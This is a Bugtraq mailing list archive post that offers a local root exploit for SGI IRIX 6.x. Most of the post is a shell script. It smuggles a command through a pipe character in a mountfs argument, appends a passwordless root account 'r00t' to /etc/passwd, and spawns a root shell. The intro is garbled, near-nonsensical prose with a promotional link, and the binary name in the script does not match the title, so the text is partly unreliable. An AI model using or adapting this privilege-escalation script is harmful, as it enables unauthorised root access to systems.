Bugtraq mailing list archives
SGI IRIX 6.*usr/sysadm/bin/runpriv local root exploit
From: "rod hedor" <rodhedor () hotmail com>
Date: Sat, 11 Mar 2006 20:59:00 +0000
SGI IRIX 6.*usr/sysadm/bin/runpriv draft resolution to be to complete at antecedence but to stoke seriously came ran ready-to-wear there is no need to explain in the interest of owners yonder protection them from geeks but whom need to make realize excellent. visit http://lezr.com/vb echo [ SGI IRIX 6.5 /usr/sysadm/bin/lezririx local root exploit echo [ Creating cleanup and shell scripts rm -rf /tmp/passwd123 rm -rf /tmp/rootcmd.sh cp /etc/passwd /tmp/passwd123 echo "#!/bin/sh" >> /tmp/rootcmd.sh echo "mv /tmp/passwd123 /etc/passwd" >> /tmp/rootcmd.sh echo "chmod 644 /etc/passwd" >> /tmp/rootcmd.sh echo "chown root:sys /etc/passwd" >> /tmp/rootcmd.sh echo "rm -rf /tmp/rootcmd.sh" >> /tmp/rootcmd.sh echo "/bin/sh" >> /tmp/rootcmd.sh chmod +x /tmp/rootcmd.sh /usr/sysadm/bin/lezririx mountfs -s test -d / -o \|"ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'" echo [ game over su r00t -c /tmp/rootcmd.sh rm -rf /tmp/passwd123 rm -rf /tmp/rootcmd.sh by: RoDhEDoR RoDhEDoR () yahoo com L-G-H Team http://www.lezr.com _________________________________________________________________Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Current thread:
- SGI IRIX 6.*usr/sysadm/bin/runpriv local root exploit rod hedor (Mar 11)